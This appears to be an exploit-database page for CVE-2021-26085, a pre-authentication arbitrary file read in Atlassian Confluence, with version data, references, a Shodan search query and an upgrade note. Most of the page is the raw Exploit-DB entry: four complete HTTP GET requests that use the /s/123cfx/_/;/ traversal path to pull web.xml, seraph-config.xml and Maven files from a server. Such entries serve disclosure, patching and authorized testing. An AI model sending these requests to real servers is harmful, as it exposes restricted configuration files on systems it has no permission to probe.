header-logo
Suggest Exploit
vendor:
Confluence
by:
Mayank Deshmukh
5,3
CVSS
MEDIUM
Pre-Authorization Arbitrary File Read
200
CWE
Product Name: Confluence
Affected Version From: < 7.4.10
Affected Version To: 7.5.0 ≤ version < 7.12.3
Patch Exists: YES
Related CWE: CVE-2021-26085
CPE: a:atlassian:confluence
Metasploit: https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26085/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=154244https://www.infosecmatter.com/nessus-plugin-library/?id=153087https://www.infosecmatter.com/nessus-plugin-library/?id=110771https://www.infosecmatter.com/nessus-plugin-library/?id=128548https://www.infosecmatter.com/nessus-plugin-library/?_page=14https://www.infosecmatter.com/nessus-plugin-library/?id=124281https://www.infosecmatter.com/nessus-plugin-library/?id=86721https://www.infosecmatter.com/nessus-plugin-library/?id=124004https://www.infosecmatter.com/nessus-plugin-library/?id=152864
Tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Nuclei References: https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.htmlhttps://jira.atlassian.com/browse/CONFSERVER-67893https://nvd.nist.gov/vuln/detail/CVE-2021-26085http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.component:"Atlassian Confluence"', 'vendor': 'atlassian', 'product': 'confluence_data_center'}
Platforms Tested: Kali Linux & Windows 10
2021

Atlassian Confluence 7.12.2 – Pre-Authorization Arbitrary File Read

Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.

Mitigation:

Upgrade to Confluence version 7.12.3 or later.
Source

Exploit-DB raw data:

# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26085

POC #1 - web.xml

GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #2 - seraph-config.xml

GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #3 - pom.properties

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

POC #4 - pom.xml

GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Navigation

Suggest Exploit

Services By CQR